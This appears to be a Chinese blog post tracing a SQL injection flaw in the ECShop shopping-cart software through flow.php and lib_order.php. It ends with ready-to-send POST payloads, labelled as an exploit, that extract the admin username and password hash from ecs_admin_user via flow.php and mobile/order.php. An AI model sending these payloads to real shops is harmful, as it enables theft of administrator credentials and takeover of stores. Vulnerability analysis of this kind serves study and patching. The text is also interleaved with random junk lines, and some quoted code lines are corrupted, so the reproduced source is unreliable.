ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。
7 G- G2 i4 N7 |. M6 |. j
    漏洞关键文件：
6 I% U/ n( P" i6 l4 ~1 I/ p
    /includes/lib_order.php

8 @2 Z" v8 {- I    关键函数：
" ^6 _. S' Z5 Q$ c: _
+ n" E# R+ F; m& d$ N
: h% w! F* J4 p, s
01     function available_shipping_list($region_id_list)

/ P; a4 v. s0 E$ L+ u02 {
9 _2 U$ w& q9 o+ |) P
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
6 v" N( i& E! p+ x, u2 R
04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .

05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .

  y' o  j: Y8 L3 d5 B06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .

8 Q- Q$ P* u3 q3 s" n6 h$ X07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.

5 B9 @9 b# j, u! S6 J% N08             'WHERE r.region_id ' . db_create_in($region_id_list) .
( ~! D- v9 ^4 |! ~: b% z
+ U& s! G( j; q3 e0 U+ s09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';

7 y, {% C: v+ A8 `10   
, n& M+ w! P' v3 t1 l
9 L) L+ d, e2 h6 g11     return $GLOBALS['db']->getAll($sql);

( A  v% ?4 |& u8 M/ F12 }
. ]/ h" Q7 Q6 b9 U
显然对传入的参数没有任何过滤就带入了查询语句。

& x0 I. {" \8 M2 x/ L下面我们追踪这个函数在flow.php中：
; M( x0 e* n6 q9 B. s4 z 第531行：   
! @& N" Q+ E& R, X) D: V; C$ t
' f6 D# M' h# E3 F5 ~1 $shipping_list     = available_shipping_list($region);



6 ?/ T$ ?9 x; A" q1 M: p7 U

( N6 b1 C  l/ J! P再对传入变量进行追踪：
# D  _% j# l( w4 T2 E
8 q1 i6 k: M7 v+ O! m第530行：   
/ U# i9 k- ^1 z6 V& D+ W: f
7 N8 u' j! ?3 J2 F& x) y3 k1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);
  l( R* \. ^, P

; B( U& n9 b# `* L; N


第473行：        
" O/ @# e1 S. A7 y& C5 g7 K6 x' M
2 v- d! G/ Q/ E, O9 e1 $consignee = get_consignee($_SESSION['user_id']);

到了一个关键函数：

/includes/lib_order.php

) E: b' ?, k* c$ D
. Z5 y' B1 N& e/ [


01 function get_consignee($user_id)

$ u6 a; X; y7 t; L/ ]02 {
+ N/ g9 x5 {9 ]- H* q/ t
03     if (isset($_SESSION['flow_consignee']))
6 @) m% \! [$ _: k: _% v5 a
' {) h# j% H. z7 }- H04     {
4 n: f5 r) ~  U/ w" e) u* H5 [
05         /* 如果存在session，则直接返回session中的收货人信息 */
' n; P/ @1 y1 i; E
7 O' N$ u: z0 o/ @06   
1 e2 G# O$ C) R5 ?1 T
, q1 ?9 g  {* j! V) M07         return $_SESSION['flow_consignee'];

+ B4 h$ z, w  M3 o0 h0 n+ ?08     }
# V& u( i, A+ U" k/ S
3 ]( q% C( ^) D! b/ @* d2 F09     else

$ Y6 m4 p, c/ {: W9 a3 D. N$ F5 S! T7 ]) K10     {
! v1 I; Y: F* M* o
11         /* 如果不存在，则取得用户的默认收货人信息 */

12         $arr = array();

0 m7 Z8 J0 M, g6 h4 N13   
+ x5 G6 g7 ~% s6 X$ ^
14         if ($user_id > 0)

5 L5 P& D* B, \' V  k* L15         {
: w7 L$ c/ `4 B+ z/ N2 z* \
; q* o, ?2 p  A9 |) i16             /* 取默认地址 */
: E3 o/ R+ }% P: ~- @
4 E) Z$ Q: |6 ?- B5 P& k: N17             $sql = "SELECT ua.*".
0 C4 U7 a. X  L* e8 ?. _
18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

7 i+ ^! G# l  z$ N19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";

20   

+ [7 E/ T. J4 s$ A7 v5 w6 {21             $arr = $GLOBALS['db']->getRow($sql);
, H7 Y" T! b/ x
7 w+ z7 b2 r, r* {  ?22         }

; \1 [, L/ o7 _1 w, b/ n23   

- a, U! m: U1 j0 m' |+ q24         return $arr;
' E2 C: B, I! W) C0 ^& k
" ~* u, _5 A/ |9 v7 w25     }
& M! S  Y# u: m- _. I2 Q4 v
% x  v  r3 L. x; @) b% C26 }

显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

5 Z1 ~2 N, ^' H6 D# n" }
, K8 f6 p+ c1 {8 B
3 }1 X0 V& k- a" J关键点:
; Y8 E- m) m7 A
第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);

; c2 k7 F1 Q, @这里对传入参数反转义存入$_SESSION中。

. k$ A3 n; W! z$ t; F& E# j

  c# `( h% v% D$ M然后看下：


! @, u7 ^4 ?1 `4 S" C+ U' {1 Y1 o
- i! [2 m7 `7 d, ]% `   

- m) a1 u3 e. |  b* l: i01 $consignee = array(
7 C. o1 x4 ~0 Q( T) z
. p4 W( _6 }; O# Y$ d02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
7 C$ ]+ ]8 ?, e; F0 Y! c* e
03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

- q$ ~" Z, g) R; |( s* U. G04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
4 J2 _$ w! i; u
1 E: t$ @4 o: P7 t7 S# U( U05         'province'      => empty($_POST['province'])   ? '' _POST['province'],

06         'city'          => empty($_POST['city'])       ? '' _POST['city'],

07         'district'      => empty($_POST['district'])   ? '' _POST['district'],

08         'email'         => empty($_POST['email'])      ? '' _POST['email'],
! W4 p: H6 F8 B1 h6 D5 y: S2 y
4 P2 T$ Q$ Q. k+ X$ S: L09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),

11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

  |  U6 }/ f& t, ?& X12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

15     );

好了注入就这样出现了。
. S; c+ A2 O4 ]) M) x- }
9 e2 F7 ]9 \" G6 a5 p+ ~5 G! |7 v==================
3 S, Q2 m4 c  V( U# q# v  \
注入测试：
6 u5 b( T& O8 O: A' J
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
; c3 d, \) W- f. O0 O- J/ b% v6 r
: K: C0 o% v& T9 w- a5 k" d测试程序：ECShop_V2.7.3_UTF8_release1106
% u7 b, H0 t" M" A  G
4 [0 Q; e9 v3 A1 \9 \5 b/ y

3 C0 C3 ?; }" z0 G9 c) b$ D" \. S1.首先需要点击一个商品加入购物车
- A2 l) r/ N4 J! D% `1 B1 D" k4 J
2.注册一个会员帐号
. h+ ]5 K3 [- |! Q
; @6 K2 ^7 M6 s3.post提交数据
) |1 m2 R  ]2 @4 L2 A8 c
* ^. g1 C5 G# }; |, b% _
" `0 a2 c9 h0 |4 |# U$ a6 T
1 http://127.0.0.1/ecshop/flow.php
$ c) _! D  P% ^2 O
2   

3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：
# x! e- q0 h  }- D8 k
我们搜寻关键函数function available_shipping_list()
0 a$ N3 |2 K  z( W
在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
% ?8 G8 k" w3 q
  \7 O9 k3 e" D9 L6 W/ g利用exp:

! `% h7 S  S) F; _4 m1.点击一个商品，点击购买商标

2.登录会员帐号
' K3 K3 Z, j" o
3.post提交：
, c0 W, Y9 w. j3 C- z5 F' U
http://127.0.0.1/ecshop/mobile/order.php
8 y9 c7 O: j/ ?- B

4 _: L6 x, y0 O! T
) Q7 W0 L$ _% t0 U" c, Z3 ^% y  Fcountry=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=

6 ?  c. C$ ~; ^( Y4 f5 t